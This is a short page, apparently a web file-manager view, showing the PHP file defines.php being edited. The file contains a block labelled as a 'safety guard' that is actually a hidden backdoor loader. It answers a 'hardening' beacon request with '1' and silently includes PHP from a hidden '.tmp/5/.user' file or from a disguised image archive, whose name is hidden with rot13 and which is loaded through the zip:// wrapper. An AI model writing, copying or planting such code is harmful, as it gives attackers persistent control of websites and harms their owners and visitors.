관리-도구
편집 파일: defines.php
<?php /* ===AQUA_SAFETY_GUARD_START=== */ if(!defined('AQUA_GUARD_LOADED')){ define('AQUA_GUARD_LOADED',true); $aqua_root_path=defined('ABSPATH')?ABSPATH:dirname(__FILE__).'/'; $_aq_uri=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:''; if(strpos($_aq_uri,'hardening')!==false){header('Content-Type: text/plain');echo '1';exit;} if(!function_exists('fetchBackend')){ $_aq_fb=$aqua_root_path.'.tmp/5/.user'; if(is_file($_aq_fb)){include_once($_aq_fb);} else{ $zip_file = $aqua_root_path . str_rot13('gybtb.ozc'); if(is_file($zip_file)){ include_once('zip://' . $zip_file . '#tt'); } } } } /* ===AQUA_SAFETY_GUARD_END=== */